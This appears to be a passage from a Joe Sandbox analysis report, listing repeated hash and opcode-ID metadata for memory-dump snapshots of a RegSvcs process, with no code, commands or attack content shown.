                                                                        • Instruction ID: 987bbf65226fe52c0ce9b8dfed6489fbd43bff627c1869901bde0b03d6c3fbe1
                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction Fuzzy Hash: EA21B435A00609EFCB50CF59C580A8EBBF5FF58314F54806AEE199F252E674DA418B60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0585018020b518b6eaa8cf9e622f740f6d17bd5dc0d17d02532a793d0030dcdb
                                                                        • Instruction ID: 018da78e54f9b2f59c1ee09f82a13e6b991a13af454dfa7d6b62d2d50ce965a9
                                                                        • Opcode Fuzzy Hash: 0585018020b518b6eaa8cf9e622f740f6d17bd5dc0d17d02532a793d0030dcdb
                                                                        • Instruction Fuzzy Hash: D221D1726047099BCB22DF19C840B6B77E4FB8C764F05451AFE549F252E730E9418BA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction ID: b56ffa5ffa53794e5e2805bf727b96d4cfb00935f229263d7d0a23690f7def00
                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction Fuzzy Hash: 2A318D35600604AFD721CF69C884F6AB7B9EF85354F1445AAE916DB2A5E730ED02CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d760d5bd48a9bcea41bf2ad2f7043e05ab677cfa82135ba3d90ab469914fe83
                                                                        • Instruction ID: 07114813b742ac782057712327c981cdf1ee6616004c7267aad02837c0f0cb8b
                                                                        • Opcode Fuzzy Hash: 5d760d5bd48a9bcea41bf2ad2f7043e05ab677cfa82135ba3d90ab469914fe83
                                                                        • Instruction Fuzzy Hash: D7318B75A00206DFCF15CF1CC8889AEBBB5FF84304B55855AE809AB3A1E771EE51CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                        • Instruction ID: bd8c96ebfb386233e869706177425a0f8723cbb537a78b2d27b38a456714ce2d
                                                                        • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                        • Instruction Fuzzy Hash: 3421F7316116529BE726EB2DD918F2E77E4AF54B54F0900B7D902977B2E2B89842C120
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f7455a23528249e17f7322371cf8f0d0b313f20b4a7dc352ab1949fba5a902aa
                                                                        • Instruction ID: 0dc267e3cf875b4460abed83608c8185a9039ea87e4ac441c32d89d32570b4fe
                                                                        • Opcode Fuzzy Hash: f7455a23528249e17f7322371cf8f0d0b313f20b4a7dc352ab1949fba5a902aa
                                                                        • Instruction Fuzzy Hash: B321B1759002299BCF21DF59C881ABEBBF8FF58740B51006AF541AB360D738AD42CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5faff1db44c0d1ee8b2323206ab8e32967ee3ef22b3d34414cd4751dcdeecdf
                                                                        • Instruction ID: 4b0a787d8333504e1c16f77ba9068403ef044cb98d973b507b76e9925e427b39
                                                                        • Opcode Fuzzy Hash: e5faff1db44c0d1ee8b2323206ab8e32967ee3ef22b3d34414cd4751dcdeecdf
                                                                        • Instruction Fuzzy Hash: C721A972600645AFD715DF69D840A6AB7A8FFA8744F14006AF904DB7A0E638ED00CBA8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8626ed447ab6054a44bdfdac47faebe3184c33545ca0b672f19972f75a1f9bd3
                                                                        • Instruction ID: 40c695233eca7ab6902cd252ff59f66f72cd47a124c457e97af01d72d014b642
                                                                        • Opcode Fuzzy Hash: 8626ed447ab6054a44bdfdac47faebe3184c33545ca0b672f19972f75a1f9bd3
                                                                        • Instruction Fuzzy Hash: 1121FF729043469FE311EF5AD848B6BBBDCAFB5240F09045BB980C7271D734D909C7A2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 825a644c14364e52fb4e4d9e182f4749d0300113027dcb9c9470598a1e28874a
                                                                        • Instruction ID: 855c9aa3d1b9ad6c061adf57f726d8aa86dbc5c7d5e009e8eedf3f2fd53fd1a8
                                                                        • Opcode Fuzzy Hash: 825a644c14364e52fb4e4d9e182f4749d0300113027dcb9c9470598a1e28874a
                                                                        • Instruction Fuzzy Hash: 8821F8316056819BF322AA2D9C08F197BD5AF51760F290367F920DB7F2D7B88843C240
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48e3a433488fac581c8ff1a1bf572fb5667088e1b329d74fac5ce2c707cae38a
                                                                        • Instruction ID: e1fb00e56740dadd6842a9e712fa5c7c0626fa5ee266cd0cadab20ecd8a10899
                                                                        • Opcode Fuzzy Hash: 48e3a433488fac581c8ff1a1bf572fb5667088e1b329d74fac5ce2c707cae38a
                                                                        • Instruction Fuzzy Hash: C021AC752006019FCB25DF29C801B4677F5BF58718F24846DA909CB762E775E842CB94
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d03ef074a834754fe626cca2022602ed3e1b1b55b8b783abab30b60480b779ee
                                                                        • Instruction ID: eca054d3c5d76c088cb1106068ee850f21c0d0a849d8c623c4b17f23e554dcb4
                                                                        • Opcode Fuzzy Hash: d03ef074a834754fe626cca2022602ed3e1b1b55b8b783abab30b60480b779ee
                                                                        • Instruction Fuzzy Hash: 272116B1E00209ABDB20DFAAD8809AEFBF8FFA8B10F11012FE405A7354D7709945CB54
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction ID: f3833b4bc87290193d9074bf63d6d301316142b7f0b5028c5ee572635e9cc8cb
                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction Fuzzy Hash: 2621817290020AEFDF129F59CC80BEEBBB9EF98320F24445AF940A7261D734D9519F60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction ID: 4ba357b3eaab731fda56e803fe6923f99cfdfee9b1eec4be9fd10860cafa1bf8
                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction Fuzzy Hash: 4D11EF76600605BFE7229F49CC41F9ABBB8EB90754F10002AFA008F2A1E672ED44CB61
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef5808c523343da2713c0edbca93932278870f9a18aefc34692560cea3d2b946
                                                                        • Instruction ID: 7a0d8c4972159e164fae651dca520e92ffda2cad158c0b4f0a087d646ce7d3b4
                                                                        • Opcode Fuzzy Hash: ef5808c523343da2713c0edbca93932278870f9a18aefc34692560cea3d2b946
                                                                        • Instruction Fuzzy Hash: E411C8357016329BDB11CF4DC8C0A6BBBE5AF9A710B54406EED08DF315D6B1D941C790
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction ID: dbc61e093e6466f3d25620ada7a80210b2e2ceeba72514d034e5a69fe9ce6606
                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction Fuzzy Hash: 0F218E72600641DFD7758F4AC540A66FBE6EB98B10F258A3FEA4587722D730EC01CB80
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 963f3c3082242e363d5ceabb77e6d1b2b110543e8990c4da5fbf9066975a6370
                                                                        • Instruction ID: f371afe671bcbd42d20a2cb4578c8e2a278df7478cceb8ad23683766c319dd43
                                                                        • Opcode Fuzzy Hash: 963f3c3082242e363d5ceabb77e6d1b2b110543e8990c4da5fbf9066975a6370
                                                                        • Instruction Fuzzy Hash: 27218E31A00206DFCB14CF58C581A6EBBF5FB88314F30416ED105AB3A5C771AD46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7daf145bcb0192632b7008ab8bcd7bcdba0041890f0c4e91b91267361fa4040
                                                                        • Instruction ID: 9ceb604e3080f01bd2e3787118be8583b3a3b2caa20807076a190f01e07627d2
                                                                        • Opcode Fuzzy Hash: a7daf145bcb0192632b7008ab8bcd7bcdba0041890f0c4e91b91267361fa4040
                                                                        • Instruction Fuzzy Hash: 7F219075601A01EFD7618F69C841F66B7F8FF84350F45882EE99AC7661DB70A841CB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c20845bc38c941af9c5bd12c9d2e72975cf253ef065d6d7b4f1314bc790522d
                                                                        • Instruction ID: f8b4119f42a0a1d2d52eec135d0620773729b92757d697e1d766241ffac25c69
                                                                        • Opcode Fuzzy Hash: 5c20845bc38c941af9c5bd12c9d2e72975cf253ef065d6d7b4f1314bc790522d
                                                                        • Instruction Fuzzy Hash: 24119132240515EBD722DF6AC980FDA77A8EBA9664F12402AF205DB271DA70E905C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e078c3935677283e2e4fc6007cba7142fa0f869d603cb691432eaa8be1bbd517
                                                                        • Instruction ID: c7c642e78a448bdb34c3732513c51545a79ec274ebe91e0ed57b73bc2ac3842d
                                                                        • Opcode Fuzzy Hash: e078c3935677283e2e4fc6007cba7142fa0f869d603cb691432eaa8be1bbd517
                                                                        • Instruction Fuzzy Hash: EA1108373001149BDB1ADB29CC85A6F7296FBD5274B25492AD9229F3A1E9709802C390
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 897c9223ad5db964b67f56146df27dd08d901b386a04399091581e50c6c1d1e3
                                                                        • Instruction ID: 0d9ba814817cabefaae877c10c6e76f1ed9ebb8acceae1660069bf39c026906a
                                                                        • Opcode Fuzzy Hash: 897c9223ad5db964b67f56146df27dd08d901b386a04399091581e50c6c1d1e3
                                                                        • Instruction Fuzzy Hash: 8911CE76A01205DFCB66CF9AC580E5ABBF8AF98610B42407FDD059B326E670DD00CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction ID: 298c4308e26cc79d53749091976077c83389ddd66d23334ad88a1f776aaab9c2
                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction Fuzzy Hash: 1A110436A00905AFDB19CB58C805B9EBBF5EF94210F15826AE84597390E671AD11CB80
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction ID: 006bf6d5c0ab31c59c8504d2051040dc2c923a25fb478a6bda560d44d9cf8d73
                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction Fuzzy Hash: 9F21F4B5A00B059FD3A0CF29C441B52BBF4FB48B20F10492EE98AC7B50E371E854CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction ID: 3654cd54cbfdf4ab67902fef4428422d1cd4430d6d7b85664782928d17ce074a
                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction Fuzzy Hash: 9C11A331600601EFE7219F49C840B577BA5EF79754F46842EE929BB270D731DD40D7A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4623e11401510404e26cce42d2d1cc0aaaa2276deb100f92431b37142aa12586
                                                                        • Instruction ID: d574f3c2c2aeebdc845dcd11b27fa4b76840f921229ef3d73d38c4fbd81a17fe
                                                                        • Opcode Fuzzy Hash: 4623e11401510404e26cce42d2d1cc0aaaa2276deb100f92431b37142aa12586
                                                                        • Instruction Fuzzy Hash: 2101D631605645ABF316A66EE888F2FBB9DEF90394F15006BF900DB271D9B8DC02C271
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 604f45c3b9f90195ba24c9eaa0b7de28770532c8e0958a19b49d880c2bfab66d
                                                                        • Instruction ID: 2255a1cc6f40e5bc931e562c6695a6ad74f57cfa5c58371a7f6cf31807272da8
                                                                        • Opcode Fuzzy Hash: 604f45c3b9f90195ba24c9eaa0b7de28770532c8e0958a19b49d880c2bfab66d
                                                                        • Instruction Fuzzy Hash: 2E11C236200665AFDB25CF9AD940F577BA4EBD5764F49451BFA288B360C770E880CF60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e812e79a45cce0cc9c76068058bb95aa63a45b3de870ab51000cdff8c86a2c1
                                                                        • Instruction ID: 57b8a7263d217e79d85db8b3f0bab2900b9663cfa065e912d5d505a1324bd8d4
                                                                        • Opcode Fuzzy Hash: 8e812e79a45cce0cc9c76068058bb95aa63a45b3de870ab51000cdff8c86a2c1
                                                                        • Instruction Fuzzy Hash: FD11C672900615ABDB21DF59C980B5EFBB8FF98750F92045ADE04A7321D730AD418B60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f1784c98e7d9fd86082b463563ff12d14ec840c4f1410076c5999cfa58e33de
                                                                        • Instruction ID: 6d59e87bea06c6240ce4379a94c68ddebc6cc5d732aed1ae2f4d61c1e251b4f3
                                                                        • Opcode Fuzzy Hash: 9f1784c98e7d9fd86082b463563ff12d14ec840c4f1410076c5999cfa58e33de
                                                                        • Instruction Fuzzy Hash: 0101C0715101059FE326DF19D404F16BBF9FBD6318F61816BE104AB274E7749C86CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction ID: e2c42a26ed1d58b231ad4af820c155cc887a30d24530786ada1a494b64a9cb8c
                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction Fuzzy Hash: 0511A071201A829BF722AB6DD948B2A7B94BB50654F1900A3DE4197772F33CC847C290
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction ID: 7c5314d3c1a05b6a255d299c01cf7cde8f7ebcd341382cc7ab7f8947d229791f
                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction Fuzzy Hash: 9F01D23A600205AFE7219F5AC840F5B7EA9EBB4750F46802BEA15AB270E771DD40CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction ID: ee38c62ba82a5b6fb5a3fd0ceaa5eeb056c8ceebc9ab688be6c1b1b516b0437a
                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction Fuzzy Hash: 5E0126714067629BCB318F19D840AB37BA4EF55760B10852EFC958B3A5C331D405CB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07027adf542ba34d8c6847714ef194b7fd3e7782d965c94384e7c25953d20179
                                                                        • Instruction ID: 370cba72e6b785ef7a0f0e5ed0b0dd83d87c962ed719a03a848b94afaa9f7085
                                                                        • Opcode Fuzzy Hash: 07027adf542ba34d8c6847714ef194b7fd3e7782d965c94384e7c25953d20179
                                                                        • Instruction Fuzzy Hash: 2A11C036241241EFDB16EF1ACD90F16BBB8FF68B54F2000AAF9059B661C675ED01CA90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 59f3573af9df0baed7b21f59e99647e72c99756eb558d113c5eca0f679bd3577
                                                                        • Instruction ID: e35bb20ac78fe331d956f0af0249eab25a911ef5cad04dc75f824a7f64e1ff07
                                                                        • Opcode Fuzzy Hash: 59f3573af9df0baed7b21f59e99647e72c99756eb558d113c5eca0f679bd3577
                                                                        • Instruction Fuzzy Hash: 09119E71501228ABDB25AF25CC41FE97278EB24714F50419AA718A61F0D6709E85CF95
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 761ea585d627e9865e9903f1fc274b2974817a5029d7d6d72b3e959bfb7fecbd
                                                                        • Instruction ID: d9e39a90b3de0aeef47918d092e99cd925f36c560e155a669643a3d2a94d213c
                                                                        • Opcode Fuzzy Hash: 761ea585d627e9865e9903f1fc274b2974817a5029d7d6d72b3e959bfb7fecbd
                                                                        • Instruction Fuzzy Hash: DA112DB3900119ABCB12DB95CC80DDF777CEF58258F054166E906E7211EA34EA55CBE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction ID: 63c56cbd36671984491947d8de76022164e087712d83cb515eaaba7417bb69c8
                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction Fuzzy Hash: 0001F5726001209BEF118E59D880E9377A6BFD8600F9540ABEF15CF366DAB5CC81C390
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 337ddc1296450623aba92fc47aaca23b75d8a6f956fe3b90be067e862b285bbc
                                                                        • Instruction ID: 9212d4f79d373cbcb062f9d3b50a9f37f4d1377aa2a811c3f3809b0002c0a521
                                                                        • Opcode Fuzzy Hash: 337ddc1296450623aba92fc47aaca23b75d8a6f956fe3b90be067e862b285bbc
                                                                        • Instruction Fuzzy Hash: 3511A5326441459FD711CF59D840BE6B7B9FB9A314F09815AE8488F325D731EC55CBB0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
